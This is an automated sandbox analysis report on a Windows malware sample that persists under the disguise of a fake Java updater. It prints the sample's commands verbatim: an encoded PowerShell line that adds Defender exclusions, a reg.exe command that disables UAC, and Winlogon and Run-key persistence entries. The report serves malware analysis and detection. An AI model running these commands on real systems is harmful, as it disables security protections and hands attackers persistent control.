Analysis
-
max time kernel
143s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
13-04-2024 08:19
Static task
static1
Behavioral task
behavioral1
Sample
f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
Resource
win10v2004-20240226-en
General
-
Target
f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe
-
Size
118KB
-
MD5
58250357e2818257885f8ab3321085c2
-
SHA1
edec3680ec5558bad5aaed1f8dd1f5f05f8243ca
-
SHA256
f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015
-
SHA512
d403ca7d62033f49e07ad05a144d59a83b81bede2d98d36284974741e72df56ee0dfbdd1d5ae7eac0587ad128b81f2c50da682b28115230e20e4afff2bf07b0e
-
SSDEEP
3072:OVjUCVOwcSlBaTPbfM+6b4UGYTX7LX9MD:AjUWcegDbfMJ+A7j9
Malware Config
Signatures
-
Modifies WinLogon for persistence 2 TTPs 2 IoCs
Processes:
test.exeJavaUpdate.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" test.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" JavaUpdate.exe -
Processes:
reg.exereg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exetest.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe Key value queried \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation test.exe -
Executes dropped EXE 2 IoCs
Processes:
test.exeJavaUpdate.exepid process 3960 test.exe 2804 JavaUpdate.exe -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
test.exeJavaUpdate.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" test.exe Set value (str) \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Java Updater = "\"C:\\Users\\Admin\\AppData\\Roaming\\JavaUpdater\\JavaUpdate.exe\"" JavaUpdate.exe -
Modifies WinLogon 2 TTPs 2 IoCs
Processes:
test.exeJavaUpdate.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ test.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows NT\CurrentVersion\Winlogon\ JavaUpdate.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 2 IoCs
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 4104 powershell.exe 4104 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 4104 powershell.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
JavaUpdate.exepid process 2804 JavaUpdate.exe -
Suspicious use of WriteProcessMemory 29 IoCs
Processes:
f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exetest.execmd.execmd.exeJavaUpdate.execmd.exedescription pid process target process PID 3016 wrote to memory of 4104 3016 f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe powershell.exe PID 3016 wrote to memory of 4104 3016 f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe powershell.exe PID 3016 wrote to memory of 3960 3016 f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe test.exe PID 3016 wrote to memory of 3960 3016 f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe test.exe PID 3016 wrote to memory of 3960 3016 f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe test.exe PID 3960 wrote to memory of 1332 3960 test.exe cmd.exe PID 3960 wrote to memory of 1332 3960 test.exe cmd.exe PID 3960 wrote to memory of 1332 3960 test.exe cmd.exe PID 1332 wrote to memory of 5084 1332 cmd.exe reg.exe PID 1332 wrote to memory of 5084 1332 cmd.exe reg.exe PID 1332 wrote to memory of 5084 1332 cmd.exe reg.exe PID 3960 wrote to memory of 4488 3960 test.exe cmd.exe PID 3960 wrote to memory of 4488 3960 test.exe cmd.exe PID 3960 wrote to memory of 4488 3960 test.exe cmd.exe PID 4488 wrote to memory of 2500 4488 cmd.exe PING.EXE PID 4488 wrote to memory of 2500 4488 cmd.exe PING.EXE PID 4488 wrote to memory of 2500 4488 cmd.exe PING.EXE PID 4488 wrote to memory of 2804 4488 cmd.exe JavaUpdate.exe PID 4488 wrote to memory of 2804 4488 cmd.exe JavaUpdate.exe PID 4488 wrote to memory of 2804 4488 cmd.exe JavaUpdate.exe PID 2804 wrote to memory of 3448 2804 JavaUpdate.exe cmd.exe PID 2804 wrote to memory of 3448 2804 JavaUpdate.exe cmd.exe PID 2804 wrote to memory of 3448 2804 JavaUpdate.exe cmd.exe PID 2804 wrote to memory of 4060 2804 JavaUpdate.exe iexplore.exe PID 2804 wrote to memory of 4060 2804 JavaUpdate.exe iexplore.exe PID 2804 wrote to memory of 4060 2804 JavaUpdate.exe iexplore.exe PID 3448 wrote to memory of 2836 3448 cmd.exe reg.exe PID 3448 wrote to memory of 2836 3448 cmd.exe reg.exe PID 3448 wrote to memory of 2836 3448 cmd.exe reg.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe"C:\Users\Admin\AppData\Local\Temp\f8057382d9ad7e73bf3c6a89ab5d523c6c01c90ad5ade386c01b1a4ffcfc0015.exe"1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHkAaAB6ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAG0AeQB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHkAYwByACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAcABzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\test.exe"C:\Users\Admin\AppData\Local\Temp\test.exe"2⤵
- Modifies WinLogon for persistence
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f4⤵
- UAC bypass
- Modifies registry key
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\install.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEPING 127.0.0.1 -n 24⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe"C:\Users\Admin\AppData\Roaming\JavaUpdater\JavaUpdate.exe"4⤵
- Modifies WinLogon for persistence
- Executes dropped EXE
- Adds Run key to start application
- Modifies WinLogon
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeC:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f6⤵
- UAC bypass
- Modifies registry key
-
C:\Program Files (x86)\Internet Explorer\iexplore.exe"C:\Program Files (x86)\Internet Explorer\iexplore.exe"5⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4280 --field-trial-handle=2328,i,5873823382323802923,13134441441264702821,262144 --variations-seed-version /prefetch:81⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
1Winlogon Helper DLL
2Privilege Escalation
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
1Winlogon Helper DLL
2Abuse Elevation Control Mechanism
1Bypass User Account Control
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rwpkkmaj.2fy.ps1Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
C:\Users\Admin\AppData\Local\Temp\install.batFilesize
158B
MD5552f91e198b5402fad934b3c7a45b5c2
SHA16c766bc9d51ba70a7769047e5ae107b798e4ed12
SHA2569c2b2133eb284e764155a96798efdff4e67e2ef38f9501ca4d9b066cfbf0da37
SHA51247128e082b7c541360e26968d9a009e38613da06ddfa14a288d90d8ca6efe8574b67d06673e52cff30d4967c42f0b871c8bd0db4b6f1b80c2db39b8d1ae1adaf
-
C:\Users\Admin\AppData\Local\Temp\test.exeFilesize
100KB
MD5f3b7cddc98281485c9bcf40314a8cfa1
SHA1a797b03d4f0aa176ac3c31509a612ff07c1a15d7
SHA2567baa3ae97c421ab54fa95d3fceca3f11900c7fc04970652400d803da18f22122
SHA5125b57a55bd40a4f57222312279989b2398bc472b57a4ca098cdbcc9456b168d9a2fefe54b3fc24ba9fcb1edb9ab60159e6887addda1285184bccb33d76010068a
-
memory/3016-0-0x0000000000010000-0x0000000000034000-memory.dmpFilesize
144KB
-
memory/3016-1-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmpFilesize
10.8MB
-
memory/3016-2-0x000000001AC70000-0x000000001AC80000-memory.dmpFilesize
64KB
-
memory/3016-32-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmpFilesize
10.8MB
-
memory/4104-11-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmpFilesize
10.8MB
-
memory/4104-12-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmpFilesize
64KB
-
memory/4104-22-0x00000266E4150000-0x00000266E4172000-memory.dmpFilesize
136KB
-
memory/4104-24-0x00000266E1FA0000-0x00000266E1FB0000-memory.dmpFilesize
64KB
-
memory/4104-27-0x00007FFCE8BB0000-0x00007FFCE9671000-memory.dmpFilesize
10.8MB